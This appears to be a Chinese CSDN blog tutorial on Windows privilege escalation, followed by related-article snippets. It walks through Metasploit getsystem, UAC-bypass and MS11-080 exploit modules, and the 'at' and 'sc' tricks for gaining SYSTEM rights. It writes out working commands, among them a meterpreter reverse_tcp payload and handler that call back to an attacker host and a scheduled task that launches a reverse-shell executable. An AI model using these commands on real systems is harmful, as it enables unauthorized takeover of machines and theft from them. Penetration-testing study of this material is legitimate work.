windows提权—msf、at、sc提权

最新推荐文章于 2024-05-20 08:33:57 发布
最新推荐文章于 2024-05-20 08:33:57 发布
阅读量658 收藏
点赞数 1
分类专栏: 渗透测试 后渗透 文章标签: windows 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/negnegil/article/details/120227350
版权

msf提权

适用版本:windows 2k3、xp

获取到服务器的 meterpreter 后,有三个方向

  • getsystem提权

可以直接使用 getsystem 提权
没成功
在这里插入图片描述

  • 绕过UAC策略

MSF使用注册表 bypass uac 提权
漏洞模块:

exploit/windows/local/ask
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection

操作:

use exploit/windows/local/ask
options
set session 4     //3被占用了
set TECHNIQUE EXE
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.109
set lport 4444
exploit

未成功
在这里插入图片描述

  • 使用漏洞提权
meterpreter > run post/windows/gather/enum_patches

显示Q147222已被安装
在这里插入图片描述

复制到在线补丁对比平台

http://bugs.hacking8.com/tiquan/

在这里插入图片描述

在这里插入图片描述

或者使用getroot-tools 查看未打补丁
下载地址:

https://github.com/5z1punch/GetRoot-Tools

在这里插入图片描述

使用MS11-080

search MS11-080
use exploit/windows/local/ms11_080_afdjoinleaf
set session 4
exploit

at 命令提权

适用系统:Windows2000、Windows 2003、Windows XP
前提:获得服务器admin权限,可以使用at命令,由此提权为system权限

at 是一个发布定时任务计划的命令行工具,语法比较简单。通过 at 命令发布的
定时任务计划, Windows 默认以 SYSTEM 权限运行。定时任务计划可以是批处理、可以是一个二进制文件

提权操作
定时开启一个cmd的shell

##通过 /interactive 开启界面交互模式
at 16.40 /interactive "cmd.exe"

在这里插入图片描述

现在我们只是获得了一个system的shell,要把系统提权到system权限才行
在得到一个system的cmd之后,使用taskmgr命令调用任务管理器,此时的
任务管理器是system权限,然后kill掉explore进程,再使用任务管理器
新建explore进程,将会得到一个system的桌面环境

C:\WINDOWS\system32\taskmgr

杀掉explore进程
在这里插入图片描述

再重新打开explorer进程
在这里插入图片描述

现在就是system权限了
在这里插入图片描述

MSF中at提权
思路:使用at命令执行木马反弹shell,攻击机上获得的shell时system权限

靶机:

at 17:34 /interactive "C:\wmpub\shell.exe"

在这里插入图片描述

kali

msf6>use exploit/multi/handler
msf6>set payload windows/meterpreter/reverse_tcp
msf6>set lhost 192.168.0.109
msf6>set lport 4444
msf6>exploit

提权成功
在这里插入图片描述

SC提权

适用版本(win7、8、08、12、16)
前提:获得服务器admin权限,可以使用at命令,由此提权为system权限

##CMD下

#配置一个服务syscmd
C:>sc Create syscmd binPath= “cmd /K start” type= own type= interact 
#启动服务获取system权限的cmd
C:>sc start syscmd

其中syscmd是服务名称,可以随意填写,binpath是启动的命令,type=own是指服务这个服务属于谁,type=interact是指交互式shell

此时就以system权限打开了一个cmd,然后和at提权的后续做法相同,使用taskmgr命令调用任务管理器,此时的任务管理器是system权限,然后kill掉explore进程,再使用任务管理器新建explore进程,将会得到一个system的桌面环境

Thgilil
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
本地用户提权-AT&SC&PS命令提权
weixin_45701675的博客
11-18 534
at命令提权的原理 at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。 适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除. 当我们拿到低权限的用户,通过连接上服务器后,可以通过at命令来进行本地提权。 测试主机:win2003 at 11:00 /interactive cmd (在11:00分生成一个交互式的System权限的cmd) 如果设定时间过时,将于次日执行。 提权system成功 ..
提权
joosonmao的专栏
04-15 1655
用http://www.microsoft.com/china/technet/sysinternals/utilities/pstools.mspx的PsExec提升explorer权限,或提升cmd权限在命令提示符下删 1.PsExec命令提升进程特权 我们可以借助PsExec命令工具以SYSTEM身份运行进程。我们已经知道只有SYSTEM帐户才能访问C:\System Volume
使用MSF进行提权windows提权、linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 840
MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
cmd+lcx+nc+sc提权工具总结
JackLiu16的博客
02-28 1176
lcx:端口映射工具1.在自己的host上的cmd下运行:lcx.exe -listen 51 3389 //意思是监听51端口并转发到3389端口2.在服务器器上运行:lcx.exe -slave myip 51 serverip 3389 //意思是把服务器的3389端口转发到自己的host的51端口3.在自己的host上的cmd下运行mstsc,输入127.0.0.1:3389远程连接服务器...
【安全牛学习笔记】提权
edu_aqniu的博客
10-30 2092
Windows • user • Administrator • System Linux • User • Root windows提权 将admin提权为system net user命令  查看账户 Guest 用户,权限很小 HelpAssistant 用户,远程协助账号 Windows system账号 • 系
Kali linux 学习笔记(二十一)提权——本地提权(at、sc、Sysinternals Suite 套件、注入进程) 2020.3.3
闵行小鱼塘
03-03 1715
初步控制目标机后,要提升权限,本节简单介绍几种本地提权方法
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url...  msfpayload windows/meterpret
msf windows
09-22
msf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windows
记一次绕过火绒安全提权实战案例1
08-03
绕过火绒安全提权实战案例1是指在 Windows 2008 R2 服务器上,绕过火绒安全软件的限制,获取服务器权限的实战案例。该案例中,服务器上安装了多种安全防护软件,包括火绒、护卫神、安全狗等。为了获取服务器权限,...
linux版Metasploit
04-06
linux版Metasploit,支持各个linux发行版本,一键安装,一键日穿内网
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
"MSFconsole(msf渗透神器)windows平台可以使用,亲测可用" 指出该资源是Metasploit Framework(简称MSF)的一个版本,特别适用于Windows操作系统,并且已经被验证为可正常运行。MSFconsole是Metasploit Framework的...
权限提权——Win提权漏洞及数据库&AT&SC&PS提权
m0_61506558的博客
10-12 634
最近在上计算机组成原理的时候接触到了数据溢出,之前也接触过一点,对于PWN选手研究的会比较深,通过本篇文章,整理提权的常用方法.当你通过弱口令爆破、敏感文件读取、sql注入等漏洞获取到了管理员的账号和密码登入后台以后,需要提升自己的权限,就得在后台页面中寻找漏洞利用的点,成功上传webshell提升权限.(一)权限提升权限介绍​ 提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。
windows提权之at&sc&ps&进程注入&令牌窃取
m0_62207170的博客
03-20 747
windows提权之at&sc&ps&进程注入&令牌窃取
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1325
进程迁移注入提权就是将获取到权限低的进程注入至进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
CISP-PTE维持记录(2022-03-30)
orange777
03-30 6873
0x00前言 初考CIST-PTE是在2019年,今天做了下维持,对其中的一些题目做下记录。其实这些题目基本上都是在网上可以找到的,其中标注的答案部分有极个别可能有误,请慎重! 这里说下题型分布,选择题40个,80分;实操题2个,20分。总分100,>=70即可拿证。下面开始吧 0x01选择题 1、()是最常用的公钥密码算法 (2分) A 量子密码B DSAC RSAD 椭圆曲线 2、通过修改HTTP Headers 中的哪个键值可以伪造来源网址() (2分) A User-AgentB Accept
MSF后渗透操作
weixin_51583379的博客
11-03 1522
1.文件交互指令Linux权限理解chmod 777 {文件名.后缀}
MSF使用详解
m0_52051132的博客
10-19 7908
一、 Meterpreter是什么Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。
Windows本地提权 · 上篇
qq_61553520的博客
05-31 1655
Windows本地提权,这种提权适用于有一本地个用户的基础上,有一定的权限,无法从webshell上进行提权
window xp 提升system权限
ljl_xyf的专栏
11-25 287
首先打开cmd,看看现在的时间,假设是10:00,然后在命令提示符中输入如下代码 at 10:01 /interactive cmd.exe 好了,到时间后则会出现另一个cmd.这是到任务管理器去终止explorer.exe进程,再在命令提示符下转到windows文件夹.命令为:cd c:\windows     然后运行explorer.exe  好了,现在的权限就是system权限了...
msf提权linux
03-30
Metasploit Framework(简称MSF)是一款广泛使用的渗透测试工具,它提供了丰富的模块和功能,其中包括了一些用于在Linux系统上进行提权的模块。提权是指通过漏洞或者其他手段获取更高权限的过程。 在Metasploit ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值